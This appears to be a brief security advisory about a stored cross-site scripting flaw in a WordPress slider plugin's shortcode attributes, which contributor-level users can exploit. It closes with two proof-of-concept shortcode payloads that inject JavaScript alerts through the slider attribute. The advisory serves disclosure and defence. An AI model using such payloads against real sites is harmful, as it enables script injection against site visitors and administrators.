The plugin does not properly validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[smartslider3 slider="'-alert(/XSS/)-'a" slide="1"]
[smartslider3 slider="'\x5d=1;alert(/XSS/)//" slide="1"]